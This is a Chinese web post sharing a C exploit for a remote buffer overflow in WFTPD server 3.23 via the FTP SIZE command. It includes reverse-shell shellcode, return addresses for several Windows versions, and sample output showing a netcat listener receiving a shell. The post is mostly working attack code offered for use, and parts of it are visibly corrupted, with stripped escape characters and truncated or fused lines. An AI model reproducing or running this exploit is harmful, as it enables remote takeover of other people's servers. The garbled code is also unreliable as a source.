软件下载地址:

wftpd.exe

wftpd server 3.23 (size) 0day remote buffer overflow exploit新出的一个溢出漏洞利用工具.

/*
* wftpd_exp.c
* wftpd server 3.23 (size) 0day remote buffer overflow exploit
* tested on xp sp2 polish, 2000 sp4 polish
* example..

c:>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444

[*] wftpd server 3.23 (size) 0day remote buffer overflow exploit
[*] coded by h07 <h07@interia.pl>
[*] ftp resp 331 give me your password, please
[*] ftp resp 230 logged in successfully
[+] sending buffer: ok
[*] press enter to quit

c:>nc -l -p 4444
microsoft windows xp [wersja 5.1.2600]
(c) copyright 1985-2001 microsoft corp.

c:wftpd323>
*/
#include <stdio.h>
#include <winsock2.h>
#define buff_size 1024
#define port 21

#pragma comment (lib, "ws2_32.lib")
//win32 reverse shellcode (metasploit.com)

char shellcode[] =

"x31xc9x83xe9xb8xd9xeexd9x74x24xf4x5bx81x73x13xb6"
"x10x92x98x83xebxfcxe2xf4x4ax7ax79xd5x5exe9x6dx67"
"x49x70x19xf4x92x34x19xddx8ax9bxeex9dxcex11x7dx13"
"xf9x08x19xc7x96x11x79xd1x3dx24x19x99x58x21x52x01"
"x1ax94x52xecxb1xd1x58x95xb7xd2x79x6cx8dx44xb6xb0"
"xc3xf5x19xc7x92x11x79xfex3dx1cxd9x13xe9x0cx93x73"
"xb5x3cx19x11xdax34x8exf9x75x21x49xfcx3dx53xa2x13"
"xf6x1cx19xe8xaaxbdx19xd8xbex4exfax16xf8x1ex7exc8"
"x49xc6xf4xcbxd0x78xa1xaaxdex67xe1xaaxe9x44x6dx48"
"xdexdbx7fx64x8dx40x6dx4exe9x99x77xfex37xfdx9ax9a"
"xe3x7ax90x67x66x78x4bx91x43xbdxc5x67x60x43xc1xcb"
"xe5x53xc1xdbxe5xefx42xf0xb6x10x92x98xd0x78x92x98"
"xd0x43x1bx79x23x78x7ex61x1cx70xc5x67x60x7ax82xc9"
"xe3xefx42xfexdcx74xf4xf0xd5x7dxf8xc8xefx39x5ex11"
"x51x7axd6x11x54x21x52x6bx1cx85x1bx65x48x52xbfx66"
"xf4x3cx1fxe2x8exbbx39x33xdex62x6cx2bxa0xefxe7xb0"
"x49xc6xc9xcfxe4x41xc3xc9xdcx11xc3xc9xe3x41x6dx48"
"xdexbdx4bx9dx78x43x6dx4exdcxefx6dxafx49xc0xfax7f"
"xcfxd6xebx67xc3x14x6dx4ex49x67x6ex67x66x78x62x12"
"xb2x4fxc1x67x60xefx42x98";

void c l ip, unsigned short port)
{
memcpy(&shellcode[184], &ip, 4);
memcpy(&shellcode[190], &port, 2);
}

unsigned l target[] =
{
0x7d16887b, //jmp esi (xp sp2 polish)
0x776f2015, //jmp esi (2000 sp4 polish)
0x7cb9e082, //jmp esi (xp sp2 english)
0x7848a5f1, //jmp esi (2000 sp4 english)
0x7ca96834 //jmp esi (xp sp2 german)
};

char buffer[buff_size];

main(int argc, char *argv[])
{
int sock, id, opt, r_len;
unsigned l eip;
unsigned l c
unsigned short c
struct hostent *he;
struct sockaddr_in client;
wsadata wsa;

printf("n[*] wftpd server 3.23 (size) 0day remote buffer overflow exploitn");
printf("[*] coded by h07 <h07@interia.pl>n");

if(argc < 8)
{
printf("[*] usage:..n %s <id> <opt> <host> <user> <pass> <c <c argv[0]);
printf("[*] id list:n");
printf("[>] 0: xp sp2 polishn");
printf("[>] 1: 2000 sp4 polishn");
printf("[>] 2: xp sp2 englishn");
printf("[>] 3: 2000 sp4 englishn");
printf("[>] 4: xp sp2 germannn");
printf("[*] opt - wftpd option 'restrict to home directory and below'n");
printf("[>] 0: disabledn");
printf("[>] 1: enablednn");
printf("[*] sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444nn", argv[0]);
exit(0);
}

wsastartup(makeword(2, 0), &wsa);

id = atoi(argv[1]);
opt = atoi(argv[2]);

if((id > 4) || (id < 0))
{
printf("[-] id error: unknown targetn");
exit(-1);
}

if((opt > 1) || (opt < 0))
{
printf("[-] opt error: unknown opti
exit(-1);
}

eip = target[id];
c = inet_addr(argv[6]) ^ (ulong)0x989210b6;
c = ht ^ (ushort)0x9892;
c c

sock = socket(af_inet, sock_stream, ipproto_tcp);

if((he = gethostbyname(argv[3])) == null)
{
printf("[-] unable to resolven");
exit(-1);
}

client.sin_addr = *((struct in_addr *)he->h_addr);
client.sin_port = ht
client.sin_family = af_inet;

if(c (struct sockaddr *) &client, sizeof(client)) == -1)
{
printf("[-] error: c
exit(-1);
}

recv(sock, buffer, buff_size -1, 0);

//user
memset(buffer, 0, buff_size);
sprintf(buffer, "user %srn", argv[4]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, buff_size -1, 0);
printf("[*] ftp resp %s", buffer);

//pass
memset(buffer, 0, buff_size);
sprintf(buffer, "pass %srn", argv[5]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, buff_size -1, 0);
printf("[*] ftp resp %s", buffer);

if(strstr(buffer, "530") != 0) exit(-1);

//size
memset(buffer, 0x90, buff_size);
memcpy(buffer, "size ", 5);

switch(opt)
{
case 0:
{
memcpy(buffer + 5, "/", 1);
r_len = 531;
break;
}
case 1:
{
memcpy(buffer + 5, "//", 2);
r_len = 532;
break;
}
}

memcpy(buffer + 7, shellcode, sizeof(shellcode) -1);
*((unsigned l = eip;
memcpy(buffer + (r_len + 4), "rnx00", 3);


if(send(sock, buffer, strlen(buffer), 0) != -1)
printf("[+] sending buffer: okn");
else
printf("[-] sending buffer: failedn");

printf("[*] press enter to quitn");
getchar();
}